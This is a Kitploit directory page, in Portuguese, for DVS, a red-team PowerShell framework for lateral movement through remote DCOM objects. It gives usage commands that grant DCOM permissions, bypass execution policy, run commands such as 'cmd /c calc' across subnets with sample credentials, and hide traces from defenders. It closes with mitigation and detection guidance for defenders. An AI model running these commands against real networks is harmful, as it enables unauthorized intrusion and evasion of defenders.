Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
DVS — D(COM) V(ulnerabilidade) S(canner) também conhecido como Canivete Suíço Traiçoeiro - Movimento lateral usando objetos DCOM | Kitploit
Ferramentas/GitHubGitHub/scorpioneslabs/dvs
ExploraçãoMovimento LateralPós-ExploraçãoTestes de PenetraçãoComando e ControleRed Teaming
GitHubscorpioneslabs/dvs

DVS

D(COM) V(ulnerabilidade) S(canner) também conhecido como Canivete Suíço Traiçoeiro - Movimento lateral usando objetos DCOM

Ver Repositório
256474há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

D(COM) V(ulnerability) S(canner) TAMBÉM CONHECIDO COMO Canivete Suíço Astuto - Movimento lateral usando Objetos DCOM

Você já se perguntou como pode se mover lateralmente através de redes internas? Ou interagir com máquinas remotas sem alertar os EDRs?
Vamos supor que temos credenciais válidas, ou uma sessão ativa com acesso a uma máquina remota, mas estamos sem uma opção para executar um processo remotamente de uma forma conhecida, esperada ou altamente monitorada (ex.: WMI, Agendador de Tarefas, WinRM, PowerShell Remoting).

Para esses cenários, o framework DVS vem ao resgate.

O framework DVS é um canivete suíço que permite enumerar funções vulneráveis de objetos DCOM remotos, lançá-los e até lançar ataques usando-os.

O framework está sendo desenvolvido com uma mentalidade "Red Team" e usa métodos furtivos para comprometer máquinas remotas.

O framework DVS contém várias maneiras de contornar o hardening remoto contra DCOM, reabilitando o acesso DCOM remotamente e concedendo automaticamente as permissões necessárias ao usuário atacante.

O framework também pode reverter alterações na máquina remota ao seu estado original, antes do ataque - ocultando essas mudanças dos defensores.

Nosso principal insight é que a ferramenta também pode executar comandos usando objetos DCOM não vulneráveis através de uma técnica interessante (Leia abaixo sobre Invoke-RegisterRemoteSchema)

Compatível com PowerShell 2.0 e superior

Vídeo PoC no Youtube: DVS

Aviso

Esta ferramenta é apenas para fins de teste e educacionais. Qualquer outro uso deste código não é permitido. Use por sua própria conta e risco.
O autor NÃO assume responsabilidade pelo uso indevido desta ferramenta.
Ao usar esta ferramenta, você aceita que qualquer dano causado pelo uso dela é de sua responsabilidade.

Acesso ao Registro - como o framework DVS utiliza esse protocolo

  • Acesso remoto ao registro (MS-RRP)

    1. Verificar a porta 445 para interagir com o registro remoto
    2. Verificar se o registro remoto está habilitado
    3. Interagir com o registro remoto
    4. Se o modo AutoGrant estiver marcado, verificar permissões de escrita; caso contrário, verificar permissões de leitura
  • Provedor de Registro Padrão (Se o registro remoto for negado)

    1. Verificar a porta 135 para interagir com o "Provedor de Registro Padrão" usando WMI
    2. Verificar se StdRegProv está acessível
    3. Interagir com o Provedor de Registro Padrão
    4. Se o modo AutoGrant estiver marcado, verificar permissões de escrita; caso contrário, verificar permissões de leitura

Por que esta ferramenta é tão furtiva?

A ferramenta DVS primeiro verifica se a identidade principal tem acesso à máquina remota através das seguintes etapas:

  • Ações básicas

    1. Operações de autenticação (se SkipRegAuth não estiver marcado)
      1. Se as credenciais forem fornecidas, cria uma sessão "net-only". Caso contrário, usará a sessão atual logada.
      2. Verificar acesso ao registro.
    2. Verificar se o recurso DCOM está ativado
    3. Permitir acesso DCOM (se AutoGrant estiver marcado), caso contrário, falhar
    4. Verificar se o usuário logado/fornecido e os grupos dos quais o usuário é membro (via recurso adsi/WindowsIdentity) têm permissão para interagir com o DCOM (através de consultas ao registro remoto)
    5. Conceder permissões (se AutoGrant estiver marcado), caso contrário, falhar
    6. Resolver o nome do domínio a partir da máquina remota usando NetBIOS sobre TCP (usando NetAPI32, ou Pacote UDP); se falhar, tentará usar o registro (Hives HKLM ou HKCU)
  • Invoke-DCOMObjectScan

    1. Interagir com objetos DCOM
    2. Enumerar o objeto DCOM e encontrar funções vulneráveis
    3. Validar a possibilidade de exploração
    4. Gerar payloads de execução
    5. Buscar informações pessoais sobre o objeto DCOM vulnerável
  • Get-ExecutionCommand

    1. Gerar payloads de execução
  • Invoke-ExecutionCommand

    1. Tentar interagir com objetos DCOM
    2. Executar os comandos
  • Invoke-RegisterRemoteSchema

    1. Tentar interagir com um dos seguintes Objetos DCOM:
      • InternetExplorer.Application - Objeto COM do InternetExplorer
      • {D5E8041D-920F-45e9-B8FB-B1DEB82C6E5E} - Outro objeto COM pertencente ao Internet Explorer
      • {C08AFD90-F2A1-11D1-8455-00A0C91F3880} - ShellBrowserWindow
      • {9BA05972-F6A8-11CF-A442-00A0C90A8F39} - ShellWindows
    2. Registrar esquema remoto (ex.: http://)
    3. Configurar o esquema para executar comandos a partir do conteúdo do esquema
    4. Executar o comando

Componentes da ferramenta

  • Analisador de direitos de segurança - Analisando os direitos da identidade principal para acessar o objeto DCOM remoto
  • Concessão de acesso remoto - Concede permissões ao usuário logado remotamente (Caso ainda não tenham sido concedidas)
  • Scanner DCOM - Escaneia e analisa objetos DCOM remotos/locais em busca de funções vulneráveis fornecidas (Padrões e nomes de funções devem ser especificados) Quando a ferramenta detecta uma função vulnerável, ela verifica quais argumentos a função inclui e se a função tem a capacidade de executar comandos
  • Gerador de comandos DCOM - Gera um payload PowerShell para execução na máquina remota
  • Relatório - Gera um relatório CSV com todas as informações sobre o objeto DCOM vulnerável
  • Execução de Comandos - Executar comandos através de objetos DCOM

Autor

  • Nimrod Levy

Licença

  • GPL v3

Cenários Testados

  • Fora do domínio para domínio
  • De dentro do domínio para outra máquina associada ao domínio
  • Do domínio para fora do domínio
  • Da sessão atual para outra máquina associada ao domínio

Sistemas Operacionais Testados

  • Windows 7 SP1
  • Windows 8.1
  • Windows 10
  • Windows Server 2019

Créditos

  • Agradecimentos a Rafel Ivgi pela mentoria e ajuda na mentalidade de arquitetura da ferramenta.
  • Agradecimentos a Yossi Sasi por me ajudar a otimizar o script.
  • Agradecimentos a Gleb Glazkov por escrever a seção de mitigação e prevenção

Instalação:

root@kitploit:~
git clone https://github.com/ScorpionesLabs/DVS
powershell -ep bypass
PS> Import-Module .\DVS.psm1
PS> Get-Help Invoke-DCOMObjectScan -Detailed  # Obter detalhes do comando Invoke-DCOMObjectScan
PS> Get-Help Get-ExecutionCommand -Detailed # Obter detalhes do comando Get-ExecutionCommand
PS> Get-Help Invoke-ExecutionCommand -Detailed # Obter detalhes do comando Invoke-ExecutionCommand
PS> Get-Help Invoke-RegisterRemoteSchema -Detailed # Obter detalhes do comando Invoke-RegisterRemoteSchema

Invoke-DCOMObjectScan

A função Invoke-DCOMObjectScan permite escanear objetos DCOM e encontrar funções vulneráveis através de uma lista de padrões ou nomes exatos de funções que você incluiu em um arquivo.

  • Exemplos:

    1. Enumera e escaneia o objeto MMC20.Application (ProgID) da máquina atacante para o host DC01 sem consultar o registro.

      root@kitploit:~
         Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -HostList DC01 -SkipRegAuth -Username "lab\administrator" -Password "Aa123456!" -Verbose
      

    Nota: A ferramenta não analisará permissões ACL e, quando bem-sucedida, resolverá todas as informações sobre o objeto, exceto os detalhes mencionados no registro (como nome do objeto, arquivo executável, etc.)

    1. Verifica se o objeto MMC20.Application (ProgID) está acessível da máquina atacante para o host DC01 sem primeiro consultar e verificar a lista de acesso do objeto DCOM.

      root@kitploit:~
         PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -HostList DC01 -SkipPermissionChecks -CheckAccessOnly -Verbose
      
    2. Valida se o MMC20.Application (ProgID) é aplicável através do intervalo 10.211.55.4/24. Se existir, a ferramenta tentará enumerar as informações sobre ele (usando a sessão atual do usuário logado).

      root@kitploit:~
         PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -Hostlist "10.211.55.4/24" -CheckAccessOnly -Verbose
      
    3. Valida se o CLSID {00020812-0000-0000-C000-000000000046} através do IP 10.211.55.4 existe e está acessível. Se existir, a ferramenta resolverá as informações sobre ele (usando credenciais lab\administrator).

      root@kitploit:~
         PS> Invoke-DCOMObjectScan -Type Single -ObjectName "{00020812-0000-0000-C000-000000000046}" -Hostlist "10.211.55.4" -CheckAccessOnly -Username "lab\administrator" -Password "Aa123456!" -Verbose   
      
    4. Escaneia todos os objetos armazenados em um caminho especificado (ex.: C:\Users\USERNAME\Desktop\DVS\objects.txt) através do IP 10.211.55.4, e encontra a lista de funções localizada no arquivo especificado como vulnerable.txt usando as credenciais lab\administrator com a seguinte configuração:
      Profundidade máxima: 4
      Resultados máximos: 1 (1 resultado para cada objeto)
      Modo AutoGrant: Se não tivermos acesso ao objeto ou se o recurso DCOM estiver desabilitado, habilita o recurso DCOM e realiza a concessão automática ao objeto DCOM relevante.
      Por fim, reverte a máquina para o mesmo estado anterior ao ataque.

      root@kitploit:~
         PS> Invoke-DCOMObjectScan -MaxDepth 4 -Type List -ObjectListFile "C:\Users\USERNAME\Desktop\DVS\objects.txt" -FunctionListFile "C:\Users\USERNAME\Desktop\DVS\vulnerable.txt" -AutoGrant -Username "lab\administrator" -Password "Aa123456!" -Hostlist "10.211.55.4" -MaxResults 1 -Verbose
      
    5. Escaneia todos os objetos armazenados nas máquinas remotas disponíveis no intervalo 10.211.55.1/24 e encontra funções potencialmente vulneráveis a partir da lista localizada no arquivo selecionado (ex.: C:\Users\USERNAME\Desktop\DVS\vulnerable.txt), excluindo os objetos no arquivo selecionado (ex.: C:\Users\USERNAME\Desktop\DVS\exclude.txt), e pula propriedades com o mesmo nome em outras rotas no mesmo objeto.
      NOTA: A flag SkipSameProperyName pode perder funções vulneráveis quando há o mesmo nome de propriedade com preferências diferentes (Métodos/outras propriedades) ou cadeia de profundidade diferente.

      root@kitploit:~
         PS> Invoke-DCOMObjectScan -MaxDepth 4 -Type All  -FunctionListFile "C:\Users\USERNAME\Desktop\DVS\vulnerable.txt" -ExcludeFileList "C:\Users\USERNAME\Desktop\DVS\exclude.txt" -Hostlist "10.211.55.1/24" -SkipSameProperyName -Verbose
      

Get-ExecutionCommand

A função Get-ExecutionCommand permite gerar um payload PowerShell que interagirá e executará com a função DCOM remota com os parâmetros relevantes.

  • Exemplos:
    1. Verifica se a identidade principal tem permissão para interagir com o objeto CLSID {00020812-0000-0000-C000-000000000046} através do IP 10.211.55.4 usando credenciais lab\administrator, então gerará o comando de execução.

      root@kitploit:~
         PS> Get-ExecutionCommand -ObjectName "{00020812-0000-0000-C000-000000000046}" -ObjectPath "DDEInitiate" -HostList "10.211.55.4" -Username "lab\Administrator" -Password "Aa123456!" -Verbose
      
    2. Verifica o acesso DCOM,
      Caso a identidade principal não tenha as permissões necessárias ou o recurso DCOM esteja desabilitado, a ferramenta habilitará o recurso DCOM, concederá acesso à identidade e interagirá com o objeto MMC20.Application (ProgID) através do IP 10.211.55.4 usando credenciais lab\administrator, e gerará o comando de execução.
      Por fim, reverterá a máquina para o mesmo estado anterior ao ataque.

      root@kitploit:~
         PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.4" -Username "lab\Administrator" -Password "Aa123456!" -AutoGrant -Verbose
      
    3. Tenta interagir com o objeto MMC20.Application (ProgID) através do intervalo 10.211.55.1/24 usando a sessão atual logada sem analisar permissões ACL, então gerará o comando de execução.

      root@kitploit:~
         PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.1/24" -SkipPermissionChecks -Verbose
      
    4. Tenta interagir com o objeto MMC20.Application (ProgID) através do IP 10.211.55.4, sem consultar o registro.

      root@kitploit:~
         PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.4" -SkipRegAuth -Verbose
      

Invoke-ExecutionCommand

A função Invoke-ExecutionCommand permite executar comandos através do Objeto DCOM usando o usuário logado ou credenciais fornecidas.

  • Exemplos:

    1. Verifica o acesso DCOM,
      Caso a identidade principal não tenha as permissões necessárias ou o recurso DCOM esteja desabilitado, a ferramenta habilitará o recurso DCOM, concederá acesso, interagirá com o objeto MMC20.Application (ProgID) através do intervalo: 10.211.55.1/24 usando a sessão atual do usuário logado e executará os seguintes comandos:

      1. Executa o comando cmd.exe /c calc

      2. Define o atributo Frame.Top como 1 Por fim, reverterá a máquina para o mesmo estado anterior ao ataque.

        root@kitploit:~
         PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -AutoGrant -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")},@{ObjectPath="Frame.Top";Arguments=@(1)} ) -HostList "10.211.55.1/24" -Verbose
        
    2. Tenta interagir com o objeto MMC20.Application (ProgID) usando credenciais lab\administrator através do IP 10.211.55.4, e executa o seguinte comando: cmd.exe /c calc.

      root@kitploit:~
         PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")}) -HostList "10.211.55.4" -Username "lab\administrator" -Password "Aa123456!" -Verbose
      
    3. Tenta interagir com o objeto MMC20.Application (ProgID) usando a sessão atual do usuário logado sem analisar permissões ACL, e executa o seguinte comando: cmd.exe /c calc.

      root@kitploit:~
         PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")}) -HostList "10.211.55.4" -SkipPermissionChecks -Verbose
      

Invoke-RegisterRemoteSchema

A função Invoke-RegisterRemoteSchema permite executar comandos através dos seguintes objetos DCOM usando o usuário logado ou credenciais fornecidas:

  • ShellBrowserWindow
  • ShellWindows
  • Internet Explorer
  • ielowutil.exe

Nota: Esses objetos DCOM não precisam de acesso ao hive da máquina local. Eles podem se estabelecer com qualquer usuário que possa acessar a máquina remota!

  • Exemplos:
    1. Executa o comando cmd /c calc no intervalo 10.211.55.1/24 usando a sessão atual logada, e concede privilégios se necessário

      root@kitploit:~
         PS> Invoke-RegisterRemoteSchema -HostList "10.211.55.1/24" -Command "cmd /c calc" -AutoGrant -Verbose
      
    2. Executa o comando cmd /c calc na máquina remota 10.211.55.4 usando credenciais fornecidas

      root@kitploit:~
         PS> Invoke-RegisterRemoteSchema -HostList "10.211.55.4" -Command "cmd /c calc" -Username "Administrator" -Password "Aa123456!" -Verbose
      

Trabalho futuro

  • Analisar e alterar regras de firewall remotamente

Mitigação e Recomendações

Técnica MITRE: T1021.003 - Remote Services: Distributed Component Object Model

Prevenção

  • Desabilitar acesso DCOM remoto

    • Considerações:
      • Aplicativos de terceiros dependentes de DCOM
      • Gerenciamento remoto do sistema usando "Instrumentação de Gerenciamento do Windows" não funcionará
      • Possíveis problemas com objetos COM
  • Desabilitar acesso ao registro remoto se não for necessário

    Ambas as opções são difíceis de implementar em um ambiente corporativo sem impacto na disponibilidade.

    No entanto, pode ser uma boa opção de hardening para endpoints que não precisam de gerenciamento remoto de domínio (ex.: endpoints autônomos).

  • Ativar Perfis de Domínio e Privados no Firewall do Windows Defender

    • A ferramenta DVS contorna esse controle de segurança criando uma regra no firewall para permitir qualquer conexão RPC dinâmica
  • Migrar para usar LAPS para reduzir a superfície de ataque. Se cada computador no domínio tiver uma senha de administrador local diferente, essa conta não pode ser usada para movimento lateral.

  • Endurecer os direitos de acesso do usuário pode prevenir este ataque

    • Usando Objetos de Política de Grupo, uma organização pode remover administradores, usuários e outros grupos da lista e migrar para usar um grupo/usuário especial para gerenciamento central que não faça login interativamente em outros computadores

      root@kitploit:~
      [Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Access this computer from the network]
      

      Em guias oficiais de hardening como CIS, a configuração recomendada para [Access this computer from the network] é com os valores "administradores e Usuários de Área de Trabalho Remota ou Usuários Autenticados". Essas recomendações são vulneráveis à ferramenta DVS.

  • Endurecer as permissões DCOM removendo os direitos dos administradores das permissões - Remote Launch e Remote Activation.

    • [Computer Configuration\Windows Settings\Local Policies\Security Options\DCOM]: Machine Launch Restrictions in Security Descriptor Definition Language (SDDL) syntax
  • Use um firewall baseado em host / firewall consciente de aplicativos para bloquear o acesso DCOM entre computadores. Especialmente para computadores que não fazem parte da infraestrutura de TI ou gerenciamento.

  • Regras de controle de aplicativos podem ser usadas como último círculo de controles de segurança para evitar que processos vulneráveis gerem processos filhos perigosos ou carreguem DLLs.
    Exemplos:

    root@kitploit:~
    mmc.exe -> cmd.exe
    explorer.exe -> regsvr.exe
    visio.exe -> wmic.exe
    excel.exe -> Rundll32.exe
    outlook.exe -> cmd.exe
    
  • Regras de redução de superfície de ataque da Microsoft podem ser usadas para evitar que processos vulneráveis gerem processos filhos perigosos.

Detecção

  • Monitore alterações no registro nos seguintes locais:

    root@kitploit:~
       [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
    

    Esta chave são as configurações de permissão DCOM. Se alteradas, pode significar que um adversário que usou a ferramenta DVS removeu o hardening.

    root@kitploit:~
      [HKEY_LOCAL_MACHINE\SOFTWARE\Classes]
    

    "As subchaves e valores de registro associados à chave [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] contêm informações sobre um aplicativo necessárias para suportar a funcionalidade COM. Essas informações incluem tópicos como formatos de dados suportados, informações de compatibilidade, identificadores programáticos, DCOM e controles." Referência do Microsoft dev center

    root@kitploit:~
      [MACHINE\SOFTWARE\policies\Microsoft\windows NT\DCOM\MachineLaunchRestriction]
    

    Esta alteração de chave pode indicar que a ferramenta DVS desabilitou as restrições remote activation e Remote Launch do DCOM.

  • Use um firewall consciente de aplicativos para bloquear o acesso DCOM entre computadores. Especialmente de um computador que não faz parte da infraestrutura de TI ou gerenciamento.

  • Sistema de prevenção de intrusão (ex.: Snort, Suricata) pode ser usado para detectar o protocolo DCOM, que é baseado em RPC (MS-RPC, MS-RPCE) e protocolo de registro remoto (MS-RRP).

    • Possível regra Snort
  • Monitore o firewall do Windows Defender habilitando o log de auditoria no tráfego bloqueado para perfis domínio e privados.

  • Monitore alterações na seguinte chave. Pode indicar que a ferramenta DVS criou uma regra para contornar as restrições de RPC dinâmico do Firewall do Microsoft Defender.

    root@kitploit:~
      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
    
  • Monitore logs de eventos do Windows:Habilitar auditoria de eventos. Configurações de auditoria que devem ser ativadas em sucesso e falha: Auditar eventos de logon de conta | Auditar eventos de logon | Auditar acesso a objetos | Auditoria NTLM

Navegue até esta chave de registro: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole] Crie novos DWORDs com valor '1' chamados ActivationFailureLoggingLevel | CallFailureLoggingLevel | InvalidSecurityDescriptorLoggingLevel

  • 4624 (Logon bem-sucedido) - A equipe azul pode criar correlação de eventos para capturar conexões de máquinas remotas ao DCOM. Exemplo:
    • ID do evento 4624 - Logon
    • Nome da conta: SYSTEM
    • Nome do processo: C:\Windows\System32\services.exe
  • 4680 (Usuário desconhecido ou senha incorreta) - Ocorrerá ao usar um usuário ou senha errados
  • 4688 (Criação de processo) - Monitorar processos vulneráveis que criam subprocessos perigosos usando um usuário administrativo. Exemplo:
    • Nome do processo criador: C:\Windows\System32\mmc.exe -> Novo nome do processo: C:\Windows\System32\cmd.exe
    • Nome do processo criador: C:\Windows\System32\svchost.exe -> Novo nome do processo: C:\Windows\System32\mmc.exe
  • 8002 (NTLM) - Auditar tráfego NTLM de entrada que seria bloqueado. Exemplo:
    • Nome do processo de chamada: C:\Windows\System32\mmc.exe
    • Identidade do usuário do processo de chamada: USER
    • Identidade de domínio do processo de chamada: DOMAIN
  • 8003 (NTLM) - Auditar autenticação NTLM neste domínio. Exemplo:
    • Usuário: User
    • Domínio: DOMAIN
    • Estação de trabalho: ATTACKER
    • Processo: C:\Windows\System32\mmc.exe / C:\Windows\System32\dllhost.exe / C:\Windows\System32\svchost.exe / C:\Program Files\Internet Explorer\iexplore.exe
    • Tipo de logon: 3
  • 10010 (Microsoft-Windows-DistributedCOM) - O servidor %1 não se registrou no DCOM dentro do tempo limite exigido.
  • 10014 (Microsoft-Windows-DistributedCOM) - para ativação de CLSID falhou devido às configurações de ativação remota desabilitadas para COM+.
  • 10015 (Microsoft-Windows-DistributedCOM) - execução do DCOM falhou devido a permissões insuficientes.
  • 10016 (Microsoft-Windows-DistributedCOM) - execução do DCOM falhou devido a permissões insuficientes. Exemplo:
    • As configurações de permissão padrão da máquina não concedem permissão de Ativação Local para o aplicativo COM Server com CLSID {C2F03A33-21F5-47FA-B4BB-156362A2F239} e APPID {316CDED5-E4AE-4B15-9113-7055D84DCC97} para o usuário DOMAIN\Scorpiones
  • 10021 (Microsoft-Windows-DistributedCOM) - O descritor de segurança de inicialização e ativação para o aplicativo COM Server com APPID {0000000} é inválido.
Baixar ferramenta